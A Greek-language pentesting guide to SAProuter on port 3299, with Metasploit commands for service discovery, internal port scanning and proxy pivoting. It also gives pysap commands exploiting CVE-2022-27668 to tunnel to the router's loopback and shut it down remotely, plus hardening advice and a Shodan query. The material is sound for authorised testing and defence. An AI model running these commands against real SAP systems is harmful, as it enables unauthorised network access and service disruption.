# 3299/tcp - Pentesting SAProuter

Reading time: 7 minutes

PORT     STATE SERVICE    VERSION
3299/tcp open  saprouter?

Αυτό είναι μια περίληψη της ανάρτησης από https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/

Κατανόηση της Διείσδυσης του SAProuter με το Metasploit

Ο SAProuter λειτουργεί ως αντίστροφος διακομιστής μεσολάβησης για τα συστήματα SAP, κυρίως για τον έλεγχο της πρόσβασης μεταξύ του διαδικτύου και των εσωτερικών δικτύων SAP. Συνήθως εκτίθεται στο διαδίκτυο επιτρέποντας την TCP θύρα 3299 μέσω των οργανωτικών τειχών προστασίας. Αυτή η ρύθμιση καθιστά τον SAProuter ελκυστικό στόχο για pentesting, καθώς μπορεί να λειτουργήσει ως πύλη προς πολύτιμα εσωτερικά δίκτυα.

Σάρωση και Συλλογή Πληροφοριών

Αρχικά, πραγματοποιείται μια σάρωση για να προσδιοριστεί αν εκτελείται ένας SAP router σε μια συγκεκριμένη IP χρησιμοποιώντας το sap_service_discovery module. Αυτό το βήμα είναι κρίσιμο για την καθ establishment της παρουσίας ενός SAP router και της ανοιχτής του θύρας.

msf> use auxiliary/scanner/sap/sap_service_discovery
msf auxiliary(sap_service_discovery) > set RHOSTS 1.2.3.101
msf auxiliary(sap_service_discovery) > run

Ακολουθώντας την ανακάλυψη, διεξάγεται περαιτέρω έρευνα στη διαμόρφωση του SAP router με το sap_router_info_request module για να αποκαλυφθούν ενδεχομένως λεπτομέρειες του εσωτερικού δικτύου.

msf auxiliary(sap_router_info_request) > use auxiliary/scanner/sap/sap_router_info_request
msf auxiliary(sap_router_info_request) > set RHOSTS 1.2.3.101
msf auxiliary(sap_router_info_request) > run

Αναγνώριση Εσωτερικών Υπηρεσιών

Με τις αποκτηθείσες πληροφορίες από το εσωτερικό δίκτυο, το sap_router_portscanner module χρησιμοποιείται για να ερευνήσει εσωτερικούς υπολογιστές και υπηρεσίες μέσω του SAProuter, επιτρέποντας μια πιο βαθιά κατανόηση των εσωτερικών δικτύων και των ρυθμίσεων υπηρεσιών.

msf auxiliary(sap_router_portscanner) > set INSTANCES 00-50
msf auxiliary(sap_router_portscanner) > set PORTS 32NN

Η ευελιξία αυτού του module στο να στοχεύει συγκεκριμένες περιπτώσεις SAP και θύρες το καθιστά ένα αποτελεσματικό εργαλείο για λεπτομερή εξερεύνηση εσωτερικών δικτύων.

Προχωρημένη Αρίθμηση και Χαρτογράφηση ACL

Περαιτέρω σάρωση μπορεί να αποκαλύψει πώς είναι διαμορφωμένες οι Λίστες Ελέγχου Πρόσβασης (ACLs) στον SAProuter, λεπτομερώς ποιες συνδέσεις επιτρέπονται ή αποκλείονται. Αυτές οι πληροφορίες είναι καθοριστικές για την κατανόηση των πολιτικών ασφαλείας και των πιθανών ευπαθειών.

msf auxiliary(sap_router_portscanner) > set MODE TCP
msf auxiliary(sap_router_portscanner) > set PORTS 80,32NN

Τυφλή Αρίθμηση Εσωτερικών Φιλοξενουμένων

Σε σενάρια όπου οι άμεσες πληροφορίες από τον SAProuter είναι περιορισμένες, μπορούν να εφαρμοστούν τεχνικές όπως η τυφλή αρίθμηση. Αυτή η προσέγγιση προσπαθεί να μαντέψει και να επαληθεύσει την ύπαρξη εσωτερικών ονομάτων φιλοξενουμένων, αποκαλύπτοντας πιθανούς στόχους χωρίς άμεσες διευθύνσεις IP.

Εκμετάλλευση Πληροφοριών για Δοκιμές Διείσδυσης

Αφού χαρτογραφήσουν το δίκτυο και εντοπίσουν προσβάσιμες υπηρεσίες, οι δοκιμαστές διείσδυσης μπορούν να αξιοποιήσουν τις δυνατότητες proxy του Metasploit για να προχωρήσουν μέσω του SAProuter για περαιτέρω εξερεύνηση και εκμετάλλευση εσωτερικών υπηρεσιών SAP.

msf auxiliary(sap_hostctrl_getcomputersystem) > set Proxies sapni:1.2.3.101:3299
msf auxiliary(sap_hostctrl_getcomputersystem) > set RHOSTS 192.168.1.18
msf auxiliary(sap_hostctrl_getcomputersystem) > run

Συμπέρασμα

Αυτή η προσέγγιση υπογραμμίζει τη σημασία των ασφαλών ρυθμίσεων SAProuter και επισημαίνει την πιθανότητα πρόσβασης σε εσωτερικά δίκτυα μέσω στοχευμένου pentesting. Η σωστή ασφάλιση των SAP routers και η κατανόηση του ρόλου τους στην αρχιτεκτονική ασφάλειας δικτύου είναι κρίσιμη για την προστασία από μη εξουσιοδοτημένη πρόσβαση.

Για περισσότερες λεπτομέρειες σχετικά με τα modules του Metasploit και τη χρήση τους, επισκεφθείτε τη βάση δεδομένων της Rapid7.

Πρόσφατες Ευπάθειες (2022-2025)

CVE-2022-27668 – Ακατάλληλος Έλεγχος Πρόσβασης ➜ Εκτέλεση Απομακρυσμένης Διοικητικής Εντολής

Τον Ιούνιο του 2022, η SAP δημοσίευσε την Σημείωση Ασφαλείας 3158375 που αντιμετωπίζει μια κρίσιμη αδυναμία (CVSS 9.8) στο SAProuter (όλοι οι πυρήνες ≥ 7.22). Ένας μη αυθεντικοποιημένος επιτιθέμενος μπορεί να εκμεταλλευτεί τις επιτρεπτικές καταχωρίσεις saprouttab για να στείλει πακέτα διαχείρισης (π.χ. shutdown, trace-level, connection-kill) από έναν απομακρυσμένο υπολογιστή, ακόμη και όταν ο δρομολογητής έχει ξεκινήσει χωρίς την επιλογή -X remote-admin.

Το πρόβλημα προκύπτει από τη δυνατότητα δημιουργίας ενός τούνελ στη δική του διεπαφή loopback του δρομολογητή στοχεύοντας τη μη καθορισμένη διεύθυνση 0.0.0.0. Μόλις το τούνελ έχει δημιουργηθεί, ο επιτιθέμενος αποκτά δικαιώματα τοπικού υπολογιστή και μπορεί να εκτελέσει οποιαδήποτε εντολή διαχείρισης.

Η πρακτική εκμετάλλευση μπορεί να αναπαραχθεί με το πλαίσιο pysap:

# 1. Build a loopback tunnel through the vulnerable SAProuter
python router_portfw.py -d <ROUTER_IP> -p 3299 \
-t 0.0.0.0    -r 3299 \
-a 127.0.0.1  -l 3299 -v

# 2. Send an admin packet (here: stop the remote router)
python router_admin.py -s -d 127.0.0.1 -p 3299

Επηρεαζόμενες εκδόσεις

• Αυτόνομος SAProuter 7.22 / 7.53
• Kernel 7.49, 7.77, 7.81, 7.85–7.88 (συμπεριλαμβανομένου του KRNL64NUC/UC)

Διόρθωση / Μετριασμός

1. Εφαρμόστε το patch που παραδόθηκε με το SAP Note 3158375.
2. Αφαιρέστε τους στόχους wildcard (*) από τις γραμμές P και S στο saprouttab.
3. Βεβαιωθείτε ότι ο δρομολογητής ξεκινά χωρίς την επιλογή -X και δεν είναι άμεσα εκτεθειμένος στο Διαδίκτυο.

Ενημερωμένα Εργαλεία & Τεχνικές

• pysap – ενεργά συντηρούμενο και παρέχει router_portfw.py, router_admin.py & router_trace.py για τη δημιουργία προσαρμοσμένων πακέτων NI/Router, fuzzing ACLs ή αυτοματοποίηση της εκμετάλλευσης CVE-2022-27668.
• Nmap – επεκτείνετε την ανίχνευση υπηρεσιών προσθέτοντας την προσαρμοσμένη πρόβλεψη SAProuter:

Probe TCP SAProuter q|\x00\x00\x00\x00|
ports 3299
match saprouter m|SAProuter ([\d.]+)| p/SAProuter/ v/$1/

Συνδυάστε με NSE scripts ή --script=banner για γρήγορη αναγνώριση εκδόσεων που διαρρέουν τη συμβολοσειρά banner (SAProuter <ver> on '<host>').

• Metasploit – τα βοηθητικά modules που εμφανίζονται παραπάνω εξακολουθούν να λειτουργούν μέσω SOCKS ή NI proxy που δημιουργείται με pysap, επιτρέποντας πλήρη ενσωμάτωση του framework ακόμη και όταν ο δρομολογητής μπλοκάρει την άμεση πρόσβαση.

Λίστα Ελέγχου Σκληροποίησης & Ανίχνευσης

• Φιλτράρετε την θύρα 3299/TCP στο τείχος προστασίας περιφέρειας – επιτρέψτε την κυκλοφορία μόνο από αξιόπιστα δίκτυα υποστήριξης SAP.
• Διατηρήστε τον SAProuter εντελώς ενημερωμένο; επαληθεύστε με saprouter -v και συγκρίνετε με το τελευταίο επίπεδο patch του kernel.
• Χρησιμοποιήστε αυστηρές, ειδικές για τον υπολογιστή καταχωρίσεις στο saprouttab; αποφύγετε τα wildcards * και απορρίψτε τους κανόνες P/S που στοχεύουν αυθαίρετους υπολογιστές ή θύρες.
• Ξεκινήστε την υπηρεσία με -S <secudir> + SNC για να επιβάλετε κρυπτογράφηση και αμοιβαία πιστοποίηση.
• Απενεργοποιήστε τη απομακρυσμένη διαχείριση (-X) και, αν είναι δυνατόν, συνδέστε τον listener στο 127.0.0.1 ενώ χρησιμοποιείτε έναν εξωτερικό αντίστροφο proxy για την απαιτούμενη κυκλοφορία.
• Παρακολουθήστε το dev_rout log για ύποπτα πακέτα ROUTER_ADM ή απροσδόκητα αιτήματα NI_ROUTE προς 0.0.0.0.

Αναφορές

• https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/
• https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/

Shodan

• port:3299 !HTTP Network packet too big